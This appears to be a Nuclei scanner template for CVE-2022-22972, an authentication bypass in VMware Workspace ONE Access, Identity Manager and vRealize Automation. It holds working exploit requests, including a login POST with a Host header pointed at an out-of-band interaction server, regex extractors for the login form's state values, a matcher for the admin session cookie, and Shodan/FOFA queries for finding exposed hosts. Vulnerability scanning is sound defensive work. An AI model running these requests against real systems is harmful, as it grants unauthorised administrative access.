VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass

id: CVE-2022-22972

info:
  name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass
  author: For3stCo1d,princechaddha
  severity: critical
  description: |
    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.
  remediation: |
    Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972).
  reference:
    - https://github.com/horizon3ai/CVE-2022-22972
    - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
    - https://www.vmware.com/security/advisories/VMSA-2022-0014.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22972
    - https://github.com/djytmdj/Tool_Summary
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22972
    cwe-id: CWE-287
    epss-score: 0.55025
    epss-percentile: 0.97657
    cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: vmware
    product: identity_manager
    shodan-query: http.favicon.hash:-1250474341
    fofa-query:
      - app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
      - icon_hash=-1250474341
      - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
  tags: cve2022,cve,vmware,auth-bypass,oast

http:
  - raw:
      - |
        GET /vcac/ HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1
        Host: {{interactsh-url}}
        Content-type: application/x-www-form-urlencoded

        protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in

    host-redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "HZN="

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: protected_state
        group: 1
        regex:
          - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>'
        internal: true
        part: body

      - type: regex
        name: horizonRelayState
        group: 1
        regex:
          - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>'
        internal: true
        part: body

      - type: regex
        name: userstore
        group: 1
        regex:
          - 'id="userstore" value="([a-z.]+)" \/>'
        internal: true
        part: body

      - type: regex
        name: userstoreDisplay
        group: 1
        regex:
          - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>'
        internal: true
        part: body

      - type: regex
        name: stickyConnectorId
        group: 1
        regex:
          - 'name="stickyConnectorId" value="(.*)"/>'
        internal: true
        part: body

      - type: kval
        name: HZN-Cookie
        kval:
          - 'HZN'
        part: header
# digest: 490a004630440220491c416781d0835cd14195ff295259140499a348a3e1762d82c65458a180071b022071502dc4cb67e06cd33b50ad9a1943a5e0e76edb016ae8fd7120cac0a1f50e06:922c64590222798bb761d5b6d8e72950